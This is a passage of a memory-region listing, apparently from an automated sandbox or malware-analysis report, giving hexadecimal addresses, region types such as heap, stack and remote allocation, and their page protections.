page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
B40000
|
trusted library section
|
page read and write
|
||
|
2A084711000
|
heap
|
page read and write
|
||
|
6F6E000
|
heap
|
page read and write
|
||
|
27CE000
|
stack
|
page read and write
|
||
|
227D0000
|
remote allocation
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
2A084840000
|
remote allocation
|
page read and write
|
||
|
2259D000
|
stack
|
page read and write
|
||
|
2A082BD0000
|
heap
|
page read and write
|
||
|
2A082C5E000
|
heap
|
page read and write
|
||
|
1BCC9780000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084D11000
|
heap
|
page read and write
|
||
|
9680000
|
direct allocation
|
page read and write
|
||
|
5C55000
|
remote allocation
|
page execute and read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
2A084DE6000
|
heap
|
page read and write
|
||
|
EB4C0FF000
|
stack
|
page read and write
|
||
|
7FFAACA12000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8988000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
heap
|
page execute and read and write
|
||
|
AC03BFD000
|
stack
|
page read and write
|
||
|
9D40000
|
direct allocation
|
page execute and read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
2A084C43000
|
heap
|
page read and write
|
||
|
6F6E000
|
heap
|
page read and write
|
||
|
2A082D03000
|
heap
|
page read and write
|
||
|
1BCC8470000
|
heap
|
page read and write
|
||
|
1A347B20000
|
heap
|
page read and write
|
||
|
2A082D0F000
|
heap
|
page read and write
|
||
|
9392000
|
heap
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
717E000
|
stack
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
2A082C50000
|
heap
|
page read and write
|
||
|
AC040BE000
|
stack
|
page read and write
|
||
|
B2E5000
|
direct allocation
|
page execute and read and write
|
||
|
2A082C6E000
|
heap
|
page read and write
|
||
|
70FF000
|
stack
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
B5B000
|
heap
|
page read and write
|
||
|
93E5000
|
heap
|
page read and write
|
||
|
4855000
|
remote allocation
|
page execute and read and write
|
||
|
2A084737000
|
heap
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
2C29000
|
trusted library allocation
|
page read and write
|
||
|
2A082CBD000
|
heap
|
page read and write
|
||
|
7FFAACC90000
|
trusted library allocation
|
page read and write
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
921E000
|
stack
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
2A082CC0000
|
heap
|
page read and write
|
||
|
7FFAACA13000
|
trusted library allocation
|
page execute and read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
1BCE0A50000
|
heap
|
page read and write
|
||
|
2A084D10000
|
heap
|
page read and write
|
||
|
A09000
|
heap
|
page read and write
|
||
|
2A084D61000
|
heap
|
page read and write
|
||
|
2A084C43000
|
heap
|
page read and write
|
||
|
5D4000
|
heap
|
page read and write
|
||
|
1BCE0AF6000
|
heap
|
page read and write
|
||
|
95DD000
|
stack
|
page read and write
|
||
|
7FFAACA14000
|
trusted library allocation
|
page read and write
|
||
|
2C60000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
86C000
|
stack
|
page read and write
|
||
|
1BCC686E000
|
heap
|
page read and write
|
||
|
2A084CA9000
|
heap
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
9720000
|
direct allocation
|
page read and write
|
||
|
2A0848C0000
|
heap
|
page read and write
|
||
|
80A1000
|
trusted library allocation
|
page read and write
|
||
|
2A084CB7000
|
heap
|
page read and write
|
||
|
25A0000
|
heap
|
page read and write
|
||
|
2A084C39000
|
heap
|
page read and write
|
||
|
2255F000
|
stack
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
6BD000
|
stack
|
page read and write
|
||
|
2A084CB3000
|
heap
|
page read and write
|
||
|
6F77000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
2A084C7F000
|
heap
|
page read and write
|
||
|
9700000
|
direct allocation
|
page read and write
|
||
|
1BCC898C000
|
trusted library allocation
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
AC041BE000
|
stack
|
page read and write
|
||
|
2A084718000
|
heap
|
page read and write
|
||
|
1BCC8481000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8B55000
|
trusted library allocation
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
3CB0000
|
remote allocation
|
page execute and read and write
|
||
|
72E0000
|
heap
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
7210000
|
heap
|
page read and write
|
||
|
2A08471B000
|
heap
|
page read and write
|
||
|
73C8D000
|
unkown
|
page read and write
|
||
|
1BCC6893000
|
heap
|
page read and write
|
||
|
2A084C2D000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
1BCE087F000
|
heap
|
page read and write
|
||
|
2A084722000
|
heap
|
page read and write
|
||
|
1BCC8440000
|
heap
|
page execute and read and write
|
||
|
6F77000
|
heap
|
page read and write
|
||
|
2A084710000
|
heap
|
page read and write
|
||
|
6655000
|
remote allocation
|
page execute and read and write
|
||
|
6E90000
|
heap
|
page read and write
|
||
|
461C000
|
stack
|
page read and write
|
||
|
9EBB8FF000
|
stack
|
page read and write
|
||
|
BCE5000
|
direct allocation
|
page execute and read and write
|
||
|
2A082CAE000
|
heap
|
page read and write
|
||
|
2A084CCB000
|
heap
|
page read and write
|
||
|
AC04E0B000
|
stack
|
page read and write
|
||
|
90B0000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
7112000
|
heap
|
page read and write
|
||
|
2DE7000
|
heap
|
page read and write
|
||
|
22A60000
|
heap
|
page read and write
|
||
|
7FFAACBC1000
|
trusted library allocation
|
page read and write
|
||
|
5D2000
|
heap
|
page read and write
|
||
|
2A084C83000
|
heap
|
page read and write
|
||
|
2291E000
|
stack
|
page read and write
|
||
|
6F39000
|
heap
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
2C42000
|
trusted library allocation
|
page read and write
|
||
|
2A084C11000
|
heap
|
page read and write
|
||
|
ACE000
|
stack
|
page read and write
|
||
|
2BB5000
|
heap
|
page read and write
|
||
|
1BCC68D5000
|
heap
|
page read and write
|
||
|
2A082CBA000
|
heap
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
47FC000
|
trusted library allocation
|
page read and write
|
||
|
4660000
|
heap
|
page execute and read and write
|
||
|
1BCC86A8000
|
trusted library allocation
|
page read and write
|
||
|
4B7F000
|
stack
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
2A084C83000
|
heap
|
page read and write
|
||
|
AC03D7E000
|
stack
|
page read and write
|
||
|
AC03CFE000
|
stack
|
page read and write
|
||
|
2A084D35000
|
heap
|
page read and write
|
||
|
7FFAACCF0000
|
trusted library allocation
|
page read and write
|
||
|
2A084722000
|
heap
|
page read and write
|
||
|
1BCE07CA000
|
heap
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
278E000
|
stack
|
page read and write
|
||
|
1BCE0AA8000
|
heap
|
page read and write
|
||
|
6EF2000
|
heap
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
1BCCA2A3000
|
trusted library allocation
|
page read and write
|
||
|
6FF0000
|
heap
|
page read and write
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
1A3479F0000
|
heap
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A082F25000
|
heap
|
page read and write
|
||
|
1BCC8909000
|
trusted library allocation
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
1BCC8507000
|
trusted library allocation
|
page read and write
|
||
|
9660000
|
direct allocation
|
page read and write
|
||
|
2A084DB3000
|
heap
|
page read and write
|
||
|
2A082CE2000
|
heap
|
page read and write
|
||
|
AC03FBC000
|
stack
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
2A084C87000
|
heap
|
page read and write
|
||
|
6C2D000
|
stack
|
page read and write
|
||
|
1BCCA30E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
2C20000
|
trusted library allocation
|
page read and write
|
||
|
8296000
|
trusted library allocation
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
74A8000
|
trusted library allocation
|
page read and write
|
||
|
2A084840000
|
remote allocation
|
page read and write
|
||
|
24FF18B0000
|
heap
|
page read and write
|
||
|
1A347D85000
|
heap
|
page read and write
|
||
|
2A082C56000
|
heap
|
page read and write
|
||
|
9640000
|
trusted library allocation
|
page read and write
|
||
|
2A082C00000
|
heap
|
page read and write
|
||
|
1BCC6891000
|
heap
|
page read and write
|
||
|
1BCC8285000
|
heap
|
page read and write
|
||
|
2A084C38000
|
heap
|
page read and write
|
||
|
2A084718000
|
heap
|
page read and write
|
||
|
2A08473A000
|
heap
|
page read and write
|
||
|
1BCC9D4A000
|
trusted library allocation
|
page read and write
|
||
|
EB4BEFB000
|
stack
|
page read and write
|
||
|
1FD000
|
stack
|
page read and write
|
||
|
7F80000
|
heap
|
page read and write
|
||
|
49FD000
|
stack
|
page read and write
|
||
|
2DE3000
|
heap
|
page read and write
|
||
|
7FFAACC10000
|
trusted library allocation
|
page read and write
|
||
|
47A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
2A082C20000
|
heap
|
page read and write
|
||
|
2A084C7F000
|
heap
|
page read and write
|
||
|
1BCE0816000
|
heap
|
page read and write
|
||
|
AC03C7E000
|
stack
|
page read and write
|
||
|
2A082D11000
|
heap
|
page read and write
|
||
|
959E000
|
stack
|
page read and write
|
||
|
1BCCA326000
|
trusted library allocation
|
page read and write
|
||
|
7DF4ECEB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
EB4BCFE000
|
stack
|
page read and write
|
||
|
4790000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
1A347AF0000
|
heap
|
page read and write
|
||
|
2CAE000
|
stack
|
page read and write
|
||
|
96F0000
|
direct allocation
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
1BCE0950000
|
heap
|
page read and write
|
||
|
801D000
|
stack
|
page read and write
|
||
|
2A082D11000
|
heap
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
2A084718000
|
heap
|
page read and write
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page read and write
|
||
|
93F6000
|
heap
|
page read and write
|
||
|
2A084C41000
|
heap
|
page read and write
|
||
|
4D9000
|
stack
|
page read and write
|
||
|
1BCE0A8D000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
6E6B000
|
stack
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
9650000
|
direct allocation
|
page read and write
|
||
|
722A000
|
heap
|
page read and write
|
||
|
2A082CAE000
|
heap
|
page read and write
|
||
|
2A082CA1000
|
heap
|
page read and write
|
||
|
2A084C3B000
|
heap
|
page read and write
|
||
|
49B000
|
stack
|
page read and write
|
||
|
2A084C43000
|
heap
|
page read and write
|
||
|
72DB000
|
heap
|
page read and write
|
||
|
2A082D16000
|
heap
|
page read and write
|
||
|
2A084CCB000
|
heap
|
page read and write
|
||
|
723A000
|
heap
|
page read and write
|
||
|
2A084840000
|
remote allocation
|
page read and write
|
||
|
2A082C6E000
|
heap
|
page read and write
|
||
|
2A084CBE000
|
heap
|
page read and write
|
||
|
AC04C0E000
|
stack
|
page read and write
|
||
|
72D3000
|
heap
|
page read and write
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
226EF000
|
stack
|
page read and write
|
||
|
1BCCA1BF000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8140000
|
heap
|
page read and write
|
||
|
7FFAACBF2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA30000
|
trusted library allocation
|
page read and write
|
||
|
2A084727000
|
heap
|
page read and write
|
||
|
2D95000
|
heap
|
page read and write
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
9610000
|
trusted library allocation
|
page read and write
|
||
|
2265E000
|
stack
|
page read and write
|
||
|
8020000
|
heap
|
page read and write
|
||
|
6F6E000
|
heap
|
page read and write
|
||
|
5255000
|
remote allocation
|
page execute and read and write
|
||
|
96C0000
|
direct allocation
|
page read and write
|
||
|
6B1F000
|
stack
|
page read and write
|
||
|
1BCE07C0000
|
heap
|
page read and write
|
||
|
2A084711000
|
heap
|
page read and write
|
||
|
1BCC6897000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page readonly
|
||
|
B90000
|
trusted library allocation
|
page read and write
|
||
|
9EBB87C000
|
stack
|
page read and write
|
||
|
1BCD8769000
|
trusted library allocation
|
page read and write
|
||
|
BAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
935C000
|
stack
|
page read and write
|
||
|
1BCE08AC000
|
heap
|
page read and write
|
||
|
4ABB000
|
stack
|
page read and write
|
||
|
931E000
|
stack
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
2A08473F000
|
heap
|
page read and write
|
||
|
9360000
|
heap
|
page read and write
|
||
|
AC04C8E000
|
stack
|
page read and write
|
||
|
A4E000
|
stack
|
page read and write
|
||
|
2A082CAE000
|
heap
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
2A084CE1000
|
heap
|
page read and write
|
||
|
73C71000
|
unkown
|
page execute read
|
||
|
8030000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E55000
|
remote allocation
|
page execute and read and write
|
||
|
9690000
|
direct allocation
|
page read and write
|
||
|
7EFB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AC03E3E000
|
stack
|
page read and write
|
||
|
1BCCA2D2000
|
trusted library allocation
|
page read and write
|
||
|
1BCCA29B000
|
trusted library allocation
|
page read and write
|
||
|
96E0000
|
direct allocation
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
6DAE000
|
stack
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
1BCD8778000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8912000
|
trusted library allocation
|
page read and write
|
||
|
2ADF000
|
stack
|
page read and write
|
||
|
1BCCA2B7000
|
trusted library allocation
|
page read and write
|
||
|
2A084C2D000
|
heap
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084CB4000
|
heap
|
page read and write
|
||
|
2A084CC4000
|
heap
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
5935000
|
trusted library allocation
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
93B7000
|
heap
|
page read and write
|
||
|
4799000
|
heap
|
page read and write
|
||
|
2A08472E000
|
heap
|
page read and write
|
||
|
1BCCA52E000
|
trusted library allocation
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
256D000
|
stack
|
page read and write
|
||
|
8050000
|
heap
|
page read and write
|
||
|
7F77000
|
stack
|
page read and write
|
||
|
1BCCA2D0000
|
trusted library allocation
|
page read and write
|
||
|
2A084719000
|
heap
|
page read and write
|
||
|
6F6E000
|
heap
|
page read and write
|
||
|
1BCE07C2000
|
heap
|
page read and write
|
||
|
281E000
|
unkown
|
page read and write
|
||
|
A8F000
|
stack
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
1BCC6903000
|
heap
|
page read and write
|
||
|
2A084718000
|
heap
|
page read and write
|
||
|
2261D000
|
stack
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8293000
|
heap
|
page read and write
|
||
|
7FFAACAF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACAC6000
|
trusted library allocation
|
page read and write
|
||
|
1BCCA440000
|
trusted library allocation
|
page read and write
|
||
|
9670000
|
direct allocation
|
page read and write
|
||
|
2A084722000
|
heap
|
page read and write
|
||
|
1BCC68F1000
|
heap
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
2A08475E000
|
heap
|
page read and write
|
||
|
2A082F28000
|
heap
|
page read and write
|
||
|
96B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084C43000
|
heap
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
1BCC6995000
|
heap
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
291F000
|
unkown
|
page read and write
|
||
|
2A082D11000
|
heap
|
page read and write
|
||
|
2A084CD4000
|
heap
|
page read and write
|
||
|
2A084C83000
|
heap
|
page read and write
|
||
|
1BCC8410000
|
heap
|
page execute and read and write
|
||
|
2A082CCB000
|
heap
|
page read and write
|
||
|
1BCCA312000
|
trusted library allocation
|
page read and write
|
||
|
1BCC81B0000
|
trusted library allocation
|
page read and write
|
||
|
2A084CCB000
|
heap
|
page read and write
|
||
|
2A084CA2000
|
heap
|
page read and write
|
||
|
1BCC6887000
|
heap
|
page read and write
|
||
|
9710000
|
direct allocation
|
page read and write
|
||
|
1BCE08D7000
|
heap
|
page execute and read and write
|
||
|
6B9E000
|
stack
|
page read and write
|
||
|
29AFCFD000
|
stack
|
page read and write
|
||
|
7219000
|
heap
|
page read and write
|
||
|
EB4B58A000
|
stack
|
page read and write
|
||
|
AC03F39000
|
stack
|
page read and write
|
||
|
2A084733000
|
heap
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page read and write
|
||
|
2272E000
|
stack
|
page read and write
|
||
|
1BCD84A1000
|
trusted library allocation
|
page read and write
|
||
|
2A084715000
|
heap
|
page read and write
|
||
|
741E000
|
stack
|
page read and write
|
||
|
93BF000
|
heap
|
page read and write
|
||
|
1BCC8170000
|
trusted library allocation
|
page read and write
|
||
|
6E2D000
|
stack
|
page read and write
|
||
|
24FF1820000
|
heap
|
page read and write
|
||
|
1BCC8190000
|
trusted library allocation
|
page read and write
|
||
|
2A084719000
|
heap
|
page read and write
|
||
|
2A082D11000
|
heap
|
page read and write
|
||
|
6CAE000
|
stack
|
page read and write
|
||
|
2A084C42000
|
heap
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page read and write
|
||
|
9600000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA20000
|
trusted library allocation
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
2A082C4F000
|
heap
|
page read and write
|
||
|
7180000
|
heap
|
page read and write
|
||
|
EB4BBFE000
|
stack
|
page read and write
|
||
|
2C3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
1BCC8280000
|
heap
|
page read and write
|
||
|
AC04D8B000
|
stack
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
809E000
|
stack
|
page read and write
|
||
|
2A084C80000
|
heap
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
2A084CBE000
|
heap
|
page read and write
|
||
|
1BCC684E000
|
heap
|
page read and write
|
||
|
1BCC8921000
|
trusted library allocation
|
page read and write
|
||
|
93F2000
|
heap
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
7FFAACAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084CF3000
|
heap
|
page read and write
|
||
|
5809000
|
trusted library allocation
|
page read and write
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
26B0000
|
heap
|
page read and write
|
||
|
45D0000
|
trusted library allocation
|
page read and write
|
||
|
EB4B8FE000
|
stack
|
page read and write
|
||
|
1BCC8935000
|
trusted library allocation
|
page read and write
|
||
|
24FF33B0000
|
heap
|
page read and write
|
||
|
929C000
|
stack
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
2A082D16000
|
heap
|
page read and write
|
||
|
1A347C20000
|
heap
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
2D9F000
|
heap
|
page read and write
|
||
|
46CE000
|
stack
|
page read and write
|
||
|
AC03743000
|
stack
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
|
227D0000
|
remote allocation
|
page read and write
|
||
|
4D5C000
|
stack
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
BA0000
|
trusted library allocation
|
page read and write
|
||
|
EB4C1FB000
|
stack
|
page read and write
|
||
|
1BCC6840000
|
heap
|
page read and write
|
||
|
1BCE0E30000
|
heap
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
1BCC8925000
|
trusted library allocation
|
page read and write
|
||
|
25D0000
|
heap
|
page read and write
|
||
|
92DB000
|
stack
|
page read and write
|
||
|
1BCC6820000
|
heap
|
page read and write
|
||
|
73C86000
|
unkown
|
page readonly
|
||
|
2A082F28000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page execute and read and write
|
||
|
9620000
|
trusted library allocation
|
page read and write
|
||
|
48F9000
|
trusted library allocation
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
7FFAACA10000
|
trusted library allocation
|
page read and write
|
||
|
2A084CD4000
|
heap
|
page read and write
|
||
|
1BCC8220000
|
trusted library allocation
|
page read and write
|
||
|
1BCE07D1000
|
heap
|
page read and write
|
||
|
1BCCA27D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAC0000
|
trusted library allocation
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
2A082D16000
|
heap
|
page read and write
|
||
|
6F11000
|
heap
|
page read and write
|
||
|
2A084C3B000
|
heap
|
page read and write
|
||
|
1BCE0841000
|
heap
|
page read and write
|
||
|
2A084CA2000
|
heap
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
2A084D60000
|
heap
|
page read and write
|
||
|
4660000
|
heap
|
page read and write
|
||
|
6F3A000
|
heap
|
page read and write
|
||
|
2D56000
|
heap
|
page read and write
|
||
|
2A084CD4000
|
heap
|
page read and write
|
||
|
1BCCA29F000
|
trusted library allocation
|
page read and write
|
||
|
2A084715000
|
heap
|
page read and write
|
||
|
1BCC8937000
|
trusted library allocation
|
page read and write
|
||
|
1BCC6740000
|
heap
|
page read and write
|
||
|
2A082C90000
|
heap
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
1BCC68D1000
|
heap
|
page read and write
|
||
|
2A084C47000
|
heap
|
page read and write
|
||
|
1BCD8490000
|
trusted library allocation
|
page read and write
|
||
|
1BCC891D000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
heap
|
page readonly
|
||
|
1BCE0848000
|
heap
|
page read and write
|
||
|
470E000
|
stack
|
page read and write
|
||
|
4D1F000
|
stack
|
page read and write
|
||
|
2A08472B000
|
heap
|
page read and write
|
||
|
9EBB97F000
|
stack
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
2A084C11000
|
heap
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
2A082D03000
|
heap
|
page read and write
|
||
|
7272000
|
heap
|
page read and write
|
||
|
1BCE07C6000
|
heap
|
page read and write
|
||
|
2A082C33000
|
heap
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page read and write
|
||
|
24FF1810000
|
heap
|
page read and write
|
||
|
6F6E000
|
heap
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
295E000
|
stack
|
page read and write
|
||
|
2A084CD4000
|
heap
|
page read and write
|
||
|
7200000
|
direct allocation
|
page read and write
|
||
|
73C8F000
|
unkown
|
page readonly
|
||
|
29AFDFF000
|
unkown
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
AC03B7E000
|
stack
|
page read and write
|
||
|
5CD000
|
heap
|
page read and write
|
||
|
24FF1B25000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
9730000
|
direct allocation
|
page read and write
|
||
|
2DBC000
|
heap
|
page read and write
|
||
|
1A347B2A000
|
heap
|
page read and write
|
||
|
1BCC6990000
|
heap
|
page read and write
|
||
|
57C9000
|
trusted library allocation
|
page read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
6E95000
|
heap
|
page read and write
|
||
|
2A082C7C000
|
heap
|
page read and write
|
||
|
A8E5000
|
direct allocation
|
page execute and read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page read and write
|
||
|
2A08471F000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
2C40000
|
trusted library allocation
|
page read and write
|
||
|
226AE000
|
stack
|
page read and write
|
||
|
45C0000
|
trusted library allocation
|
page read and write
|
||
|
1BCD8481000
|
trusted library allocation
|
page read and write
|
||
|
2A084DE0000
|
heap
|
page read and write
|
||
|
AC03AFE000
|
stack
|
page read and write
|
||
|
2A084713000
|
heap
|
page read and write
|
||
|
7352000
|
trusted library allocation
|
page read and write
|
||
|
2251E000
|
stack
|
page read and write
|
||
|
6F3A000
|
heap
|
page read and write
|
||
|
1BCCA27A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A084742000
|
heap
|
page read and write
|
||
|
24FF18B8000
|
heap
|
page read and write
|
||
|
EB4BDFD000
|
stack
|
page read and write
|
||
|
96A0000
|
direct allocation
|
page read and write
|
||
|
1BCC894B000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
AC0423B000
|
stack
|
page read and write
|
||
|
6EB8000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
6F2E000
|
heap
|
page read and write
|
||
|
2A082CAE000
|
heap
|
page read and write
|
||
|
2A082D16000
|
heap
|
page read and write
|
||
|
2A084C91000
|
heap
|
page read and write
|
||
|
BA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A082F20000
|
heap
|
page read and write
|
||
|
73C70000
|
unkown
|
page readonly
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
1BCC6866000
|
heap
|
page read and write
|
||
|
2A084C83000
|
heap
|
page read and write
|
||
|
7000000
|
heap
|
page read and write
|
||
|
2A082C57000
|
heap
|
page read and write
|
||
|
26EC000
|
heap
|
page read and write
|
||
|
2A082C8D000
|
heap
|
page read and write
|
||
|
93A7000
|
heap
|
page read and write
|
||
|
2280E000
|
stack
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
2A082CBA000
|
heap
|
page read and write
|
||
|
925D000
|
stack
|
page read and write
|
||
|
228DC000
|
stack
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
1BCC8D3F000
|
trusted library allocation
|
page read and write
|
||
|
6F35000
|
heap
|
page read and write
|
||
|
1BCC6940000
|
heap
|
page read and write
|
||
|
1BCE08D0000
|
heap
|
page execute and read and write
|
||
|
1BCC81A0000
|
heap
|
page readonly
|
||
|
75EB000
|
stack
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
2D62000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
1BCCA291000
|
trusted library allocation
|
page read and write
|
||
|
2A084718000
|
heap
|
page read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
|
24FF1840000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
24FF1B20000
|
heap
|
page read and write
|
||
|
1A347D80000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
2D2E000
|
heap
|
page read and write
|
||
|
6D6A000
|
stack
|
page read and write
|
||
|
1BCC68A7000
|
heap
|
page read and write
|
||
|
7FFAACA2B000
|
trusted library allocation
|
page read and write
|
||
|
2A084C6C000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
